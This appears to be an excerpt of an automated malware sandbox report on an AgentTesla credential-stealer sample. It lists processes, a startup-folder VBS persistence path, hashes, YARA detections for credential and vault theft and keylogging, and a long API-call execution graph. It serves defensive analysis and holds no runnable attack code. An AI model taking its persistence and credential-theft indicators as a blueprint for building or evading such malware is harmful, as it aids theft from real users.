                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1889523991.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.1889523991.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1886565219.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.1886565219.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                      Reputation:high
                                      Has exited:true

                                      Target ID:3
                                      Start time:23:39:44
                                      Start date:10/01/2025
                                      Path:C:\Windows\System32\wscript.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\troopwise.vbs"
                                      Imagebase:0x7ff669ac0000
                                      File size:170'496 bytes
                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:4
                                      Start time:23:39:45
                                      Start date:10/01/2025
                                      Path:C:\Users\user\AppData\Local\seskin\troopwise.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Local\seskin\troopwise.exe"
                                      Imagebase:0x550000
                                      File size:615'936 bytes
                                      MD5 hash:79129CF9382F91AB74A895CD2C5A0C7F
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.1887838994.00000000024C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000004.00000002.1887838994.00000000024C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.1887838994.00000000024C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000004.00000002.1887838994.00000000024C0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: 00000004.00000002.1887838994.00000000024C0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                      Reputation:low
                                      Has exited:true

                                      Target ID:5
                                      Start time:23:39:45
                                      Start date:10/01/2025
                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Local\seskin\troopwise.exe"
                                      Imagebase:0xeb0000
                                      File size:45'984 bytes
                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.4204586491.000000000331E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.4204586491.0000000003306000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:high
                                      Has exited:false

                                        Execution Graph

                                        Execution Coverage:3.4%
                                        Dynamic/Decrypted Code Coverage:0.4%
                                        Signature Coverage:10.3%
                                        Total number of Nodes:2000
                                        Total number of Limit Nodes:177
                                        execution_graph 97568 e81078 97573 e871eb 97568->97573 97570 e8108c 97604 ea2f80 97570->97604 97574 e871fb __write_nolock 97573->97574 97607 e877c7 97574->97607 97578 e872ba 97619 ea074f 97578->97619 97585 e877c7 59 API calls 97586 e872eb 97585->97586 97638 e87eec 97586->97638 97588 e872f4 RegOpenKeyExW 97589 ebecda RegQueryValueExW 97588->97589 97593 e87316 Mailbox 97588->97593 97590 ebed6c RegCloseKey 97589->97590 97591 ebecf7 97589->97591 97590->97593 97603 ebed7e _wcscat Mailbox __NMSG_WRITE 97590->97603 97642 ea0ff6 97591->97642 97593->97570 97594 ebed10 97652 e8538e 97594->97652 97597 ebed38 97655 e87d2c 97597->97655 97599 e87b52 59 API calls 97599->97603 97600 ebed52 97600->97590 97602 e83f84 59 API calls 97602->97603 97603->97593 97603->97599 97603->97602 97664 e87f41 97603->97664 97729 ea2e84 97604->97729 97606 e81096 97608 ea0ff6 Mailbox 59 API calls 97607->97608 97609 e877e8 97608->97609 97610 ea0ff6 Mailbox 59 API calls 97609->97610 97611 e872b1 97610->97611 97612 e84864 97611->97612 97668 eb1b90 97612->97668 97615 e87f41 59 API calls 97616 e84897 97615->97616 97670 e848ae 97616->97670 97618 e848a1 Mailbox 97618->97578 97620 eb1b90 __write_nolock 97619->97620 97621 ea075c GetFullPathNameW 97620->97621 97622 ea077e 97621->97622 97623 e87d2c 59 API calls 97622->97623 97624 e872c5 97623->97624 97625 e87e0b 97624->97625 97626 e87e1f 97625->97626 97627 ebf173 97625->97627 97692 e87db0 97626->97692 97697 e88189 97627->97697 97630 e872d3 97632 e83f84 97630->97632 97631 ebf17e __NMSG_WRITE _memmove 97633 e83f92 97632->97633 97637 e83fb4 _memmove 97632->97637 97635 ea0ff6 Mailbox 59 API calls 97633->97635 97634 ea0ff6 Mailbox 59 API calls 97636 e83fc8 97634->97636 97635->97637 97636->97585 97637->97634 97639 e87f06 97638->97639 97641 e87ef9 97638->97641 97640 ea0ff6 Mailbox 59 API calls 97639->97640 97640->97641 97641->97588 97645 ea0ffe 97642->97645 97644 ea1018 97644->97594 97645->97644 97647 ea101c 
std::exception::exception 97645->97647 97700 ea594c 97645->97700 97717 ea35e1 RtlDecodePointer 97645->97717 97718 ea87db RaiseException 97647->97718 97649 ea1046 97719 ea8711 58 API calls _free 97649->97719 97651 ea1058 97651->97594 97653 ea0ff6 Mailbox 59 API calls 97652->97653 97654 e853a0 RegQueryValueExW 97653->97654 97654->97597 97654->97600 97656 e87da5 97655->97656 97658 e87d38 __NMSG_WRITE 97655->97658 97657 e87e8c 59 API calls 97656->97657 97663 e87d56 _memmove 97657->97663 97659 e87d4e 97658->97659 97660 e87d73 97658->97660 97728 e88087 59 API calls Mailbox 97659->97728 97662 e88189 59 API calls 97660->97662 97662->97663 97663->97600 97665 e87f50 __NMSG_WRITE _memmove 97664->97665 97666 ea0ff6 Mailbox 59 API calls 97665->97666 97667 e87f8e 97666->97667 97667->97603 97669 e84871 GetModuleFileNameW 97668->97669 97669->97615 97671 eb1b90 __write_nolock 97670->97671 97672 e848bb GetFullPathNameW 97671->97672 97673 e848da 97672->97673 97674 e848f7 97672->97674 97675 e87d2c 59 API calls 97673->97675 97676 e87eec 59 API calls 97674->97676 97677 e848e6 97675->97677 97676->97677 97680 e87886 97677->97680 97681 e87894 97680->97681 97684 e87e8c 97681->97684 97683 e848f2 97683->97618 97685 e87ea3 _memmove 97684->97685 97686 e87e9a 97684->97686 97685->97683 97686->97685 97688 e87faf 97686->97688 97689 e87fc2 97688->97689 97691 e87fbf _memmove 97688->97691 97690 ea0ff6 Mailbox 59 API calls 97689->97690 97690->97691 97691->97685 97693 e87dbf __NMSG_WRITE 97692->97693 97694 e88189 59 API calls 97693->97694 97695 e87dd0 _memmove 97693->97695 97696 ebf130 _memmove 97694->97696 97695->97630 97698 ea0ff6 Mailbox 59 API calls 97697->97698 97699 e88193 97698->97699 97699->97631 97701 ea59c7 97700->97701 97705 ea5958 97700->97705 97726 ea35e1 RtlDecodePointer 97701->97726 97703 ea59cd 97727 ea8d68 58 API calls __getptd_noexit 97703->97727 97704 ea5963 97704->97705 97720 eaa3ab 58 API calls __NMSG_WRITE 97704->97720 97721 eaa408 58 API calls 5 library calls 97704->97721 97722 
ea32df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 97704->97722 97705->97704 97708 ea598b RtlAllocateHeap 97705->97708 97711 ea59b3 97705->97711 97715 ea59b1 97705->97715 97723 ea35e1 RtlDecodePointer 97705->97723 97708->97705 97709 ea59bf 97708->97709 97709->97645 97724 ea8d68 58 API calls __getptd_noexit 97711->97724 97725 ea8d68 58 API calls __getptd_noexit 97715->97725 97717->97645 97718->97649 97719->97651 97720->97704 97721->97704 97723->97705 97724->97715 97725->97709 97726->97703 97727->97709 97728->97663 97730 ea2e90 __wfsopen 97729->97730 97737 ea3457 97730->97737 97736 ea2eb7 __wfsopen 97736->97606 97754 ea9e4b 97737->97754 97739 ea2e99 97740 ea2ec8 RtlDecodePointer RtlDecodePointer 97739->97740 97741 ea2ea5 97740->97741 97742 ea2ef5 97740->97742 97751 ea2ec2 97741->97751 97742->97741 97800 ea89e4 59 API calls __cftoe2_l 97742->97800 97744 ea2f58 RtlEncodePointer RtlEncodePointer 97744->97741 97745 ea2f2c 97745->97741 97750 ea2f46 RtlEncodePointer 97745->97750 97802 ea8aa4 61 API calls 2 library calls 97745->97802 97746 ea2f07 97746->97744 97746->97745 97801 ea8aa4 61 API calls 2 library calls 97746->97801 97749 ea2f40 97749->97741 97749->97750 97750->97744 97803 ea3460 97751->97803 97755 ea9e6f RtlEnterCriticalSection 97754->97755 97756 ea9e5c 97754->97756 97755->97739 97761 ea9ed3 97756->97761 97758 ea9e62 97758->97755 97785 ea32f5 58 API calls 3 library calls 97758->97785 97762 ea9edf __wfsopen 97761->97762 97763 ea9ee8 97762->97763 97764 ea9f00 97762->97764 97786 eaa3ab 58 API calls __NMSG_WRITE 97763->97786 97773 ea9f21 __wfsopen 97764->97773 97789 ea8a5d 58 API calls 2 library calls 97764->97789 97767 ea9eed 97787 eaa408 58 API calls 5 library calls 97767->97787 97768 ea9f15 97771 ea9f2b 97768->97771 97772 ea9f1c 97768->97772 97770 ea9ef4 97788 ea32df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 97770->97788 97776 ea9e4b __lock 58 API calls 97771->97776 97790 ea8d68 58 API calls __getptd_noexit 
97772->97790 97773->97758 97778 ea9f32 97776->97778 97779 ea9f3f 97778->97779 97780 ea9f57 97778->97780 97791 eaa06b InitializeCriticalSectionAndSpinCount 97779->97791 97792 ea2f95 97780->97792 97783 ea9f4b 97798 ea9f73 RtlLeaveCriticalSection _doexit 97783->97798 97786->97767 97787->97770 97789->97768 97790->97773 97791->97783 97793 ea2fc7 __dosmaperr 97792->97793 97794 ea2f9e RtlFreeHeap 97792->97794 97793->97783 97794->97793 97795 ea2fb3 97794->97795 97799 ea8d68 58 API calls __getptd_noexit 97795->97799 97797 ea2fb9 GetLastError 97797->97793 97798->97773 97799->97797 97800->97746 97801->97745 97802->97749 97806 ea9fb5 RtlLeaveCriticalSection 97803->97806 97805 ea2ec7 97805->97736 97806->97805 97807 11921a8 97821 118fde8 97807->97821 97809 1192283 97824 1192098 97809->97824 97827 11932c8 GetPEB 97821->97827 97823 1190473 97823->97809 97825 11920a1 Sleep 97824->97825 97826 11920af 97825->97826 97828 11932f2 97827->97828 97828->97823 97829 ec4599 97833 ed655c 97829->97833 97831 ec45a4 97832 ed655c 85 API calls 97831->97832 97832->97831 97834 ed6596 97833->97834 97839 ed6569 97833->97839 97834->97831 97835 ed6598 97872 e89488 84 API calls Mailbox 97835->97872 97837 ed659d 97844 e89997 97837->97844 97839->97834 97839->97835 97839->97837 97842 ed6590 97839->97842 97871 e89700 59 API calls _wcsstr 97842->97871 97845 e899ab 97844->97845 97846 e899b1 97844->97846 97862 e87c8e 97845->97862 97847 ebf9fc __i64tow 97846->97847 97848 e899f9 97846->97848 97850 e899b7 __itow 97846->97850 97853 ebf903 97846->97853 97873 ea38d8 83 API calls 3 library calls 97848->97873 97852 ea0ff6 Mailbox 59 API calls 97850->97852 97854 e899d1 97852->97854 97855 ebf97b Mailbox _wcscpy 97853->97855 97856 ea0ff6 Mailbox 59 API calls 97853->97856 97854->97845 97857 e87f41 59 API calls 97854->97857 97874 ea38d8 83 API calls 3 library calls 97855->97874 97858 ebf948 97856->97858 97857->97845 97859 ea0ff6 Mailbox 59 API calls 97858->97859 97860 ebf96e 97859->97860 97860->97855 97861 e87f41 59 API 
calls 97860->97861 97861->97855 97863 e87ca0 97862->97863 97864 ebf094 97862->97864 97875 e87bb1 97863->97875 97881 ed8123 59 API calls _memmove 97864->97881 97867 e87cac 97867->97834 97868 ebf09e 97882 e881a7 97868->97882 97870 ebf0a6 Mailbox 97871->97834 97872->97837 97873->97850 97874->97847 97876 e87bbf 97875->97876 97880 e87be5 _memmove 97875->97880 97877 ea0ff6 Mailbox 59 API calls 97876->97877 97876->97880 97878 e87c34 97877->97878 97879 ea0ff6 Mailbox 59 API calls 97878->97879 97879->97880 97880->97867 97881->97868 97883 e881ba 97882->97883 97884 e881b2 97882->97884 97883->97870 97886 e880d7 59 API calls 2 library calls 97884->97886 97886->97883 97887 ea7e93 97888 ea7e9f __wfsopen 97887->97888 97924 eaa048 GetStartupInfoW 97888->97924 97890 ea7ea4 97926 ea8dbc GetProcessHeap 97890->97926 97892 ea7efc 97893 ea7f07 97892->97893 98009 ea7fe3 58 API calls 3 library calls 97892->98009 97927 ea9d26 97893->97927 97896 ea7f0d 97897 ea7f18 __RTC_Initialize 97896->97897 98010 ea7fe3 58 API calls 3 library calls 97896->98010 97948 ead812 97897->97948 97900 ea7f27 97901 ea7f33 GetCommandLineW 97900->97901 98011 ea7fe3 58 API calls 3 library calls 97900->98011 97967 eb5173 GetEnvironmentStringsW 97901->97967 97904 ea7f32 97904->97901 97907 ea7f4d 97910 ea7f58 97907->97910 98012 ea32f5 58 API calls 3 library calls 97907->98012 97977 eb4fa8 97910->97977 97911 ea7f5e 97912 ea7f69 97911->97912 98013 ea32f5 58 API calls 3 library calls 97911->98013 97991 ea332f 97912->97991 97915 ea7f71 97916 ea7f7c __wwincmdln 97915->97916 98014 ea32f5 58 API calls 3 library calls 97915->98014 97997 e8492e 97916->97997 97919 ea7f90 97920 ea7f9f 97919->97920 98015 ea3598 58 API calls _doexit 97919->98015 98016 ea3320 58 API calls _doexit 97920->98016 97923 ea7fa4 __wfsopen 97925 eaa05e 97924->97925 97925->97890 97926->97892 98017 ea33c7 36 API calls 2 library calls 97927->98017 97929 ea9d2b 98018 ea9f7c InitializeCriticalSectionAndSpinCount __alloc_osfhnd 97929->98018 97931 ea9d30 97932 
ea9d34 97931->97932 98020 ea9fca TlsAlloc 97931->98020 98019 ea9d9c 61 API calls 2 library calls 97932->98019 97935 ea9d39 97935->97896 97936 ea9d46 97936->97932 97937 ea9d51 97936->97937 98021 ea8a15 97937->98021 97940 ea9d93 98029 ea9d9c 61 API calls 2 library calls 97940->98029 97943 ea9d98 97943->97896 97944 ea9d72 97944->97940 97945 ea9d78 97944->97945 98028 ea9c73 58 API calls 4 library calls 97945->98028 97947 ea9d80 GetCurrentThreadId 97947->97896 97949 ead81e __wfsopen 97948->97949 97950 ea9e4b __lock 58 API calls 97949->97950 97951 ead825 97950->97951 97952 ea8a15 __calloc_crt 58 API calls 97951->97952 97953 ead836 97952->97953 97954 ead8a1 GetStartupInfoW 97953->97954 97955 ead841 __wfsopen @_EH4_CallFilterFunc@8 97953->97955 97957 ead9e5 97954->97957 97960 ead8b6 97954->97960 97955->97900 97956 eadaad 98043 eadabd RtlLeaveCriticalSection _doexit 97956->98043 97957->97956 97962 eada32 GetStdHandle 97957->97962 97963 eada45 GetFileType 97957->97963 98042 eaa06b InitializeCriticalSectionAndSpinCount 97957->98042 97959 ead904 97959->97957 97964 ead938 GetFileType 97959->97964 98041 eaa06b InitializeCriticalSectionAndSpinCount 97959->98041 97960->97957 97960->97959 97961 ea8a15 __calloc_crt 58 API calls 97960->97961 97961->97960 97962->97957 97963->97957 97964->97959 97968 ea7f43 97967->97968 97969 eb5184 97967->97969 97973 eb4d6b GetModuleFileNameW 97968->97973 98044 ea8a5d 58 API calls 2 library calls 97969->98044 97971 eb51aa _memmove 97972 eb51c0 FreeEnvironmentStringsW 97971->97972 97972->97968 97974 eb4d9f _wparse_cmdline 97973->97974 97976 eb4ddf _wparse_cmdline 97974->97976 98045 ea8a5d 58 API calls 2 library calls 97974->98045 97976->97907 97978 eb4fb9 97977->97978 97979 eb4fc1 __NMSG_WRITE 97977->97979 97978->97911 97980 ea8a15 __calloc_crt 58 API calls 97979->97980 97981 eb4fea __NMSG_WRITE 97980->97981 97981->97978 97982 eb5041 97981->97982 97984 ea8a15 __calloc_crt 58 API calls 97981->97984 97985 eb5066 97981->97985 97988 eb507d 97981->97988 
98046 eb4857 58 API calls __cftoe2_l 97981->98046 97983 ea2f95 _free 58 API calls 97982->97983 97983->97978 97984->97981 97986 ea2f95 _free 58 API calls 97985->97986 97986->97978 98047 ea9006 IsProcessorFeaturePresent 97988->98047 97990 eb5089 97990->97911 97993 ea333b __IsNonwritableInCurrentImage 97991->97993 98070 eaa711 97993->98070 97994 ea3359 __initterm_e 97995 ea2f80 __cinit 67 API calls 97994->97995 97996 ea3378 __cinit __IsNonwritableInCurrentImage 97994->97996 97995->97996 97996->97915 97998 e84948 97997->97998 98008 e849e7 97997->98008 97999 e84982 745EC8D0 97998->97999 98073 ea35ac 97999->98073 98003 e849ae 98085 e84a5b SystemParametersInfoW SystemParametersInfoW 98003->98085 98005 e849ba 98086 e83b4c 98005->98086 98007 e849c2 SystemParametersInfoW 98007->98008 98008->97919 98009->97893 98010->97897 98011->97904 98015->97920 98016->97923 98017->97929 98018->97931 98019->97935 98020->97936 98022 ea8a1c 98021->98022 98024 ea8a57 98022->98024 98026 ea8a3a 98022->98026 98030 eb5446 98022->98030 98024->97940 98027 eaa026 TlsSetValue 98024->98027 98026->98022 98026->98024 98038 eaa372 Sleep 98026->98038 98027->97944 98028->97947 98029->97943 98031 eb5451 98030->98031 98037 eb546c 98030->98037 98032 eb545d 98031->98032 98031->98037 98039 ea8d68 58 API calls __getptd_noexit 98032->98039 98034 eb547c RtlAllocateHeap 98035 eb5462 98034->98035 98034->98037 98035->98022 98037->98034 98037->98035 98040 ea35e1 RtlDecodePointer 98037->98040 98038->98026 98039->98035 98040->98037 98041->97959 98042->97957 98043->97955 98044->97971 98045->97976 98046->97981 98048 ea9011 98047->98048 98053 ea8e99 98048->98053 98052 ea902c 98052->97990 98054 ea8eb3 _memset ___raise_securityfailure 98053->98054 98055 ea8ed3 IsDebuggerPresent 98054->98055 98061 eaa395 SetUnhandledExceptionFilter UnhandledExceptionFilter 98055->98061 98058 ea8fba 98060 eaa380 GetCurrentProcess TerminateProcess 98058->98060 98059 ea8f97 ___raise_securityfailure 98062 eac836 98059->98062 98060->98052 
98061->98059 98063 eac83e 98062->98063 98064 eac840 IsProcessorFeaturePresent 98062->98064 98063->98058 98066 eb5b5a 98064->98066 98069 eb5b09 5 API calls ___raise_securityfailure 98066->98069 98068 eb5c3d 98068->98058 98069->98068 98071 eaa714 RtlEncodePointer 98070->98071 98071->98071 98072 eaa72e 98071->98072 98072->97994 98074 ea9e4b __lock 58 API calls 98073->98074 98075 ea35b7 RtlDecodePointer RtlEncodePointer 98074->98075 98138 ea9fb5 RtlLeaveCriticalSection 98075->98138 98077 e849a7 98078 ea3614 98077->98078 98079 ea3638 98078->98079 98080 ea361e 98078->98080 98079->98003 98080->98079 98139 ea8d68 58 API calls __getptd_noexit 98080->98139 98082 ea3628 98140 ea8ff6 9 API calls __cftoe2_l 98082->98140 98084 ea3633 98084->98003 98085->98005 98087 e83b59 __write_nolock 98086->98087 98088 e877c7 59 API calls 98087->98088 98089 e83b63 GetCurrentDirectoryW 98088->98089 98141 e83778 98089->98141 98091 e83b8c IsDebuggerPresent 98092 e83b9a 98091->98092 98093 ebd4ad MessageBoxA 98091->98093 98095 ebd4c7 98092->98095 98096 e83bb7 98092->98096 98125 e83c73 98092->98125 98093->98095 98094 e83c7a SetCurrentDirectoryW 98099 e83c87 Mailbox 98094->98099 98351 e87373 59 API calls Mailbox 98095->98351 98222 e873e5 98096->98222 98099->98007 98100 ebd4d7 98105 ebd4ed SetCurrentDirectoryW 98100->98105 98102 e83bd5 GetFullPathNameW 98103 e87d2c 59 API calls 98102->98103 98104 e83c10 98103->98104 98238 e90a8d 98104->98238 98105->98099 98108 e83c2e 98109 e83c38 98108->98109 98352 ee4c03 AllocateAndInitializeSid CheckTokenMembership FreeSid 98108->98352 98254 e83a58 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 98109->98254 98112 ebd50a 98112->98109 98116 ebd51b 98112->98116 98115 e83c42 98117 e83c55 98115->98117 98262 e843db 98115->98262 98118 e84864 61 API calls 98116->98118 98273 e90b30 98117->98273 98119 ebd523 98118->98119 98122 e87f41 59 API calls 98119->98122 98124 ebd530 98122->98124 98123 e83c60 98123->98125 98350 e844cb Shell_NotifyIconW _memset 98123->98350 
98126 ebd53a 98124->98126 98127 ebd55f 98124->98127 98125->98094 98129 e87e0b 59 API calls 98126->98129 98130 e87e0b 59 API calls 98127->98130 98131 ebd545 98129->98131 98132 ebd55b GetForegroundWindow ShellExecuteW 98130->98132 98133 e87c8e 59 API calls 98131->98133 98136 ebd58f Mailbox 98132->98136 98135 ebd552 98133->98135 98137 e87e0b 59 API calls 98135->98137 98136->98125 98137->98132 98138->98077 98139->98082 98140->98084 98142 e877c7 59 API calls 98141->98142 98143 e8378e 98142->98143 98353 e83d43 98143->98353 98145 e837ac 98146 e84864 61 API calls 98145->98146 98147 e837c0 98146->98147 98148 e87f41 59 API calls 98147->98148 98149 e837cd 98148->98149 98367 e84f3d 98149->98367 98152 ebd3ae 98434 ee97e5 98152->98434 98153 e837ee Mailbox 98156 e881a7 59 API calls 98153->98156 98159 e83801 98156->98159 98157 ebd3cd 98158 ea2f95 _free 58 API calls 98157->98158 98161 ebd3da 98158->98161 98391 e893ea 98159->98391 98163 e84faa 84 API calls 98161->98163 98165 ebd3e3 98163->98165 98169 e83ee2 59 API calls 98165->98169 98166 e87f41 59 API calls 98167 e8381a 98166->98167 98394 e88620 98167->98394 98171 ebd3fe 98169->98171 98170 e8382c Mailbox 98172 e87f41 59 API calls 98170->98172 98173 e83ee2 59 API calls 98171->98173 98174 e83852 98172->98174 98175 ebd41a 98173->98175 98176 e88620 69 API calls 98174->98176 98177 e84864 61 API calls 98175->98177 98178 e83861 Mailbox 98176->98178 98179 ebd43f 98177->98179 98182 e877c7 59 API calls 98178->98182 98180 e83ee2 59 API calls 98179->98180 98181 ebd44b 98180->98181 98183 e881a7 59 API calls 98181->98183 98184 e8387f 98182->98184 98185 ebd459 98183->98185 98398 e83ee2 98184->98398 98187 e83ee2 59 API calls 98185->98187 98189 ebd468 98187->98189 98195 e881a7 59 API calls 98189->98195 98191 e83899 98191->98165 98192 e838a3 98191->98192 98193 ea313d _W_store_winword 60 API calls 98192->98193 98194 e838ae 98193->98194 98194->98171 98196 e838b8 98194->98196 98197 ebd48a 98195->98197 98198 ea313d _W_store_winword 60 API calls 
98196->98198 98199 e83ee2 59 API calls 98197->98199 98200 e838c3 98198->98200 98201 ebd497 98199->98201 98200->98175 98202 e838cd 98200->98202 98201->98201 98203 ea313d _W_store_winword 60 API calls 98202->98203 98204 e838d8 98203->98204 98204->98189 98205 e83919 98204->98205 98207 e83ee2 59 API calls 98204->98207 98205->98189 98206 e83926 98205->98206 98414 e8942e 98206->98414 98208 e838fc 98207->98208 98210 e881a7 59 API calls 98208->98210 98212 e8390a 98210->98212 98214 e83ee2 59 API calls 98212->98214 98214->98205 98217 e893ea 59 API calls 98219 e83961 98217->98219 98218 e89040 60 API calls 98218->98219 98219->98217 98219->98218 98220 e83ee2 59 API calls 98219->98220 98221 e839a7 Mailbox 98219->98221 98220->98219 98221->98091 98223 e873f2 __write_nolock 98222->98223 98224 ebee4b _memset 98223->98224 98225 e8740b 98223->98225 98227 ebee67 7523D0D0 98224->98227 98226 e848ae 60 API calls 98225->98226 98228 e87414 98226->98228 98229 ebeeb6 98227->98229 99289 ea09d5 98228->99289 98232 e87d2c 59 API calls 98229->98232 98234 ebeecb 98232->98234 98234->98234 98235 e87429 99307 e869ca 98235->99307 98239 e90a9a __write_nolock 98238->98239 99559 e86ee0 98239->99559 98241 e90a9f 98242 e83c26 98241->98242 99570 e912fe 89 API calls 98241->99570 98242->98100 98242->98108 98244 e90aac 98244->98242 99571 e94047 91 API calls Mailbox 98244->99571 98246 e90ab5 98246->98242 98247 e90ab9 GetFullPathNameW 98246->98247 98248 e87d2c 59 API calls 98247->98248 98249 e90ae5 98248->98249 98250 e87d2c 59 API calls 98249->98250 98251 e90af2 98250->98251 98252 ec50d5 _wcscat 98251->98252 98253 e87d2c 59 API calls 98251->98253 98253->98242 98255 ebd49c 98254->98255 98256 e83ac2 LoadImageW RegisterClassExW 98254->98256 99613 e848fe LoadImageW EnumResourceNamesW 98255->99613 99609 e83041 GetSysColorBrush RegisterClassExW RegisterClipboardFormatW 98256->99609 98260 ebd4a5 98261 e839e7 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 98261->98115 98263 e84406 _memset 98262->98263 99614 e84213 
98263->99614 98266 e8448b 98268 e844c1 Shell_NotifyIconW 98266->98268 98269 e844a5 Shell_NotifyIconW 98266->98269 98270 e844b3 98268->98270 98269->98270 99618 e8410d 98270->99618 98272 e844ba 98272->98117 98274 ec50ed 98273->98274 98285 e90b55 98273->98285 99697 eea0b5 89 API calls 4 library calls 98274->99697 98276 e90e5a 98276->98123 98279 e91044 98279->98276 98280 e91051 98279->98280 99695 e911f3 331 API calls Mailbox 98280->99695 98281 e90bab PeekMessageW 98349 e90b65 Mailbox 98281->98349 98284 e91058 LockWindowUpdate DestroyWindow GetMessageW 98284->98276 98287 e9108a 98284->98287 98285->98349 99698 e89fbd 60 API calls 98285->99698 99699 ed68bf 331 API calls 98285->99699 98286 ec52ab Sleep 98286->98349 98289 ec6082 TranslateMessage DispatchMessageW GetMessageW 98287->98289 98289->98289 98291 ec60b2 98289->98291 98290 e90e44 98290->98276 99694 e911d0 10 API calls Mailbox 98290->99694 98291->98276 98292 ec517a TranslateAcceleratorW 98295 e90fa3 PeekMessageW 98292->98295 98292->98349 98293 e89fbd 60 API calls 98293->98349 98294 e90fbf TranslateMessage DispatchMessageW 98294->98295 98295->98349 98296 ec5c49 WaitForSingleObject 98300 ec5c66 GetExitCodeProcess CloseHandle 98296->98300 98296->98349 98298 ea0ff6 59 API calls Mailbox 98298->98349 98299 e90e73 timeGetTime 98299->98349 98333 e910f5 98300->98333 98301 e90fdd Sleep 98334 e90fee Mailbox 98301->98334 98302 e881a7 59 API calls 98302->98349 98303 e877c7 59 API calls 98303->98334 98304 ec5f22 Sleep 98304->98334 98307 ea0719 timeGetTime 98307->98334 98308 e910ae timeGetTime 99696 e89fbd 60 API calls 98308->99696 98311 ec5fb9 GetExitCodeProcess 98314 ec5fcf WaitForSingleObject 98311->98314 98315 ec5fe5 CloseHandle 98311->98315 98312 e89997 84 API calls 98312->98349 98313 e8b93d 109 API calls 98313->98334 98314->98315 98314->98349 98315->98334 98318 f061ac 110 API calls 98318->98334 98319 ec5c9e 98319->98333 98320 ec54a2 Sleep 98320->98349 98321 ec6041 Sleep 98321->98349 98323 e87f41 59 API calls 98323->98334 
98327 e8a000 304 API calls 98327->98349 98333->98123 98334->98303 98334->98307 98334->98311 98334->98313 98334->98318 98334->98319 98334->98320 98334->98321 98334->98323 98334->98333 98334->98349 99706 ee28f7 60 API calls 98334->99706 99707 e89fbd 60 API calls 98334->99707 99708 e88b13 69 API calls Mailbox 98334->99708 99709 e8b89c 331 API calls 98334->99709 99710 ed6a50 60 API calls 98334->99710 99711 ee54e6 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 98334->99711 99712 ee3e91 66 API calls Mailbox 98334->99712 98335 eea0b5 89 API calls 98335->98349 98337 e88b13 69 API calls 98337->98349 98338 e89df0 59 API calls Mailbox 98338->98349 98339 e88620 69 API calls 98339->98349 98340 e8b89c 304 API calls 98340->98349 98342 ed66f4 59 API calls Mailbox 98342->98349 98343 ec59ff VariantClear 98343->98349 98344 ec5a95 VariantClear 98344->98349 98345 e88e34 59 API calls Mailbox 98345->98349 98346 ec5843 VariantClear 98346->98349 98347 ed7405 59 API calls 98347->98349 98348 e87f41 59 API calls 98348->98349 98349->98281 98349->98286 98349->98290 98349->98292 98349->98293 98349->98294 98349->98295 98349->98296 98349->98298 98349->98299 98349->98301 98349->98302 98349->98304 98349->98308 98349->98312 98349->98327 98349->98333 98349->98334 98349->98335 98349->98337 98349->98338 98349->98339 98349->98340 98349->98342 98349->98343 98349->98344 98349->98345 98349->98346 98349->98347 98349->98348 99641 e8e800 98349->99641 99672 e8f5c0 98349->99672 99691 e8e580 331 API calls 98349->99691 99692 e8fe40 331 API calls 2 library calls 98349->99692 99693 e831ce IsDialogMessageW GetClassLongW 98349->99693 99700 f0629f 59 API calls 98349->99700 99701 ee9c9f 59 API calls Mailbox 98349->99701 99702 edd9e3 59 API calls 98349->99702 99703 ed6665 59 API calls 2 library calls 98349->99703 99704 e88561 59 API calls 98349->99704 99705 e8843f 59 API calls Mailbox 98349->99705 98350->98125 98351->98100 98352->98112 98354 e83d50 __write_nolock 98353->98354 98355 
